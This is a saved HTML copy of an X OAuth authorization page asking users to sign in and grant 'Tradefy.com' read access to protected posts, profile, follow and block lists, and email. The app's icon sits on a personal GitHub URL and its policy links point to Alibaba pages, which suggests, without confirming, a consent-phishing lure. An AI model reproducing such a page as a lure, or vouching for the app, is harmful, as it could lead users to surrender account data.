<!DOCTYPE html>
<html lang="en" dir="ltr" class="" style="display: block;"><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;">
      <script src="//abs-0.twimg.com/login/redirect_x.f20424c5b392053b4fdeb62b1a10e3bdb8ffef5b.js" type="text/javascript"></script><style type="text/css" id="operaUserStyle"></style><style type="text/css" id="operaUserStyle"></style>
  <title>X / Authorize an application</title>
    <link rel="stylesheet" type="text/css" media="screen" href="https://abs-0.twimg.com/login/tfw-base.3baf723b92aa68729f921c77ca3e3c1315116392.css">
    <!--[if (IEMobile) & (lt IE 9)]>
      <link href="https://abs-0.twimg.com/login/phoenix-iemobile.49b26ac21d4736060188b5b79bbabc69ca8ef790.css" media="screen" rel="stylesheet" type="text/css" />
    <![endif]-->
        

<meta name="mswebdialog-title" content="X">
<meta name="mswebdialog-logo" content="https://abs.twimg.com/responsive-web/client-web/X_logo_white.22c1baea.png">
<meta name="mswebdialog-header-color" content="#202020">
<meta name="mswebdialog-newwindowurl" content="*">



      <script src="//abs-0.twimg.com/login/base.7ced3ee3ff61dadf91a9c9bd7082adc8f158a360.js" type="text/javascript"></script>
      <script src="//abs-0.twimg.com/login/authorize_page.c4edf9ccaf94a42b6963991691957aaa827aa56b.js" type="text/javascript"></script>
  <style>
.SZtYvzWrXeJRZGPvvuKZjrkX {
  width: 152px !important;
  position: fixed !important;
  left: 20px !important;
  bottom: 20px !important;
  display: block !important;
  background: #333333 !important;
  color: #fff !important;
  padding: 8px 10px !important;
  z-index: 10000000 !important;
  border-radius: 50px !important;
  font-size: 0 !important;
  overflow: hidden !important;
  will-change: background, width !important;
  transition: 0.25s background, 0.25s width !important;
  display: flex  !important;
  flex-direction: row  !important;
  align-items: center  !important;
  padding: 8px 12px  !important;
  gap: 10px  !important;
  box-shadow: 0px 5px 25px rgba(0, 0, 0, 0.1)  !important;
  text-decoration: none !important;
}
.SZtYvzWrXeJRZGPvvuKZjrkX:hover {
  opacity: 1 !important;
  background: #0F8140 !important;
}
.SZtYvzWrXeJRZGPvvuKZjrkX:hover svg {
  transform: scale(1.1) !important;
}
.SZtYvzWrXeJRZGPvvuKZjrkX svg {
  will-change: transform !important;
  transition: 0.25s transform !important;
}
.SZtYvzWrXeJRZGPvvuKZjrkX p {
  font-family: "Inter", -apple-system, BlinkMacSystemFont, Segoe UI, Helvetica, Arial, sans-serif !important;
  font-style: normal !important;
  font-weight: 600 !important;
  font-size: 12px !important;
  line-height: 125% !important;
  margin: 0 !important;
  padding: 0 4px 0 0 !important;
  color: #fff !important;
}
</style></head>
  
  
  <body class="oauth  tfw en logged-out    noloki js js">

    <div id="header" role="banner">
      <div class="bar">
        <h1 class="logo">
          <a class="alternate-context" href="https://x.com/home">X</a>
        </h1>

        <div id="not-logged-in">
              <a href="https://x.com/signup?context=oauth&amp;oauth_token=vsnAwwAAAAAAah48AAABkmhYtF8" class="register alternate-context">Sign up for X</a>

        </div>
      </div>
    </div>

    <div id="bd" role="main">
          




    <div class="auth">
      <h2>Authorize Tradefy.com to access your account?</h2>

      <div class="app-info" role="content-info" tabindex="0">
  <h3>
    <img alt="" class="app-icon" src="https://raw.githubusercontent.com/Kirito-C/accediconx/refs/heads/main/logo.png" title="Tradefy.com">
    Tradefy.com
  </h3>
  <dl>
      <dt class="url">Application URL</dt>
      <dd class="url">www.Tradefy.com</dd>
      <dt class="notes">About this app</dt>
      <dd class="notes"><p>Tradefy</p></dd>
      <dt class="terms">Privacy Policy</dt>
      <dd class="terms"><p><a href="https://rule.alibaba.com/rule/detail/2034.htm">Privacy Policy</a></p></dd>
      <dt class="terms">Terms and Conditions</dt>
      <dd class="terms"><p><a href="https://rule.alibaba.com/rule/detail/2041.htm">Terms and Conditions</a></p></dd>

  </dl>
</div>

        <form action="https://x.com/oauth/authenticate" id="oauth_form" method="post" target="_self">
          <div>
            <input name="authenticity_token" type="hidden" value="8d4735b5f3ffa43293a58b9b8a404875b930ee6f">
            <input name="redirect_after_login" type="hidden" value="https://api.x.com/oauth/authenticate?oauth_token=vsnAwwAAAAAAah48AAABkmhYtF8">
            <input name="force_login" type="hidden" value="false">
          </div>

          <input id="oauth_token" name="oauth_token" type="hidden" value="vsnAwwAAAAAAah48AAABkmhYtF8">

            <fieldset class="sign-in">
  <legend>Log in to X</legend>
  <div class="row user">
    <input aria-required="true" autocapitalize="off" autocorrect="off" autofocus="autofocus" class="text" id="username_or_email" name="session[username_or_email]" type="text" placeholder="Username or email" value="">
  </div>
  <div class="row password">
    <input aria-required="true" class="password text" id="password" name="session[password]" type="password" placeholder="Password" value="">
  </div>
  <p>
    <input type="checkbox" name="remember_me" id="remember" value="1">
    <label for="remember">Remember me</label>
    ·
    <a href="https://x.com/account/resend_password" class="alternate-context" target="_blank">Forgot password?</a>
  </p>
    <input type="hidden" name="ui_metrics" autocomplete="off" value="{&quot;rf&quot;:{&quot;aac42cabac83345f2becd8b4febeee40df624de14477ee27e025bf2f71dbfe94&quot;:8,&quot;a6ff256a379fdb3a5c313f21d4f9f81da4f7e61d48486a4cf77d49a511248604&quot;:-1,&quot;aa7f931b98c1554ab0576c89d80912848c5db83c9bacf58f83f7784531f91a4f&quot;:7,&quot;a14d76608f00cc8b8e80786477b0789476360bbc71329786f7e22b4a97ddd9a1&quot;:-9},&quot;s&quot;:&quot;IwC_eRB5RohXJG1rsdyigqkc4QsyNAWIh4dQlKpPXfMRx7kwm5HJSA7JV2XXG876bxUe6typkI7Zxwwco9v7mK33lFPrhBhyP29NAP7odxiyb6lN-M6ursXIBiblSub_CETII3NLu9qBi0JkvORDThhebJB48BHA2bnF8jZGchIZJJky0uLXUtXHFyXs5Eb0uyUqmrMwvoy93U0VJUgkosayJiPRr8puxuon5gdCqGrFIXc7gb4IlFL7sWQo23EkREfKxed1DM5dGYfGBjIcfRhkUWWhxDB1cgnjBRcJagsI-T2VOQpIg_5i7E91BSSFoygaHUnohTuEPTyPHjUsiAAAAZJtm49z&quot;}">
    <script src="https://x.com/i/js_inst?c_name=ui_metrics" async=""></script>
</fieldset>


          <fieldset class="buttons">
            <legend>Sign in to Tradefy.com using your account?</legend>
            <input type="submit" value="Sign In" class="submit button selected" id="allow">

              <input class="submit button" id="cancel" name="cancel" type="submit" value="Cancel">

          </fieldset>
        </form>

      
<div class="permissions allow">
  <p><strong>This application will be able to:</strong></p>
   <ul class="permissions allow">
      <li>See Posts from your timeline (including protected Posts) as well as your Lists and collections.</li>
      <li>See your X profile information and account settings.</li>
      <li>See accounts you follow, mute, and block.</li>
      <li>See your email address.</li>
</ul>


</div>




      <div>
  <p><small>Learn more about third-party app permissions in the <a href="https://help.x.com/managing-your-account/connect-or-revoke-access-to-third-party-apps" target="_blank">Help Center</a>.</small></p>
</div>


    </div>

    </div>


  <div class="footer" role="navigation"><div id="ft">
    
        
  <p class="tip">We recommend reviewing the app’s terms and privacy policy to understand how it will use data from your X account. You can revoke access to any app at any time from the <a href="https://x.com/settings/applications" target="_blank">Apps and sessions</a> section of your X account settings.</p>
  <p><small>By authorizing an app you continue to operate under X’s <a href="https://x.com/tos" target="_blank">Terms of Service</a>. In particular, some usage information will be shared back with X. For more, see our <a href="https://x.com/privacy" target="_blank">Privacy Policy</a>.</small></p>



  </div></div>


</body></html>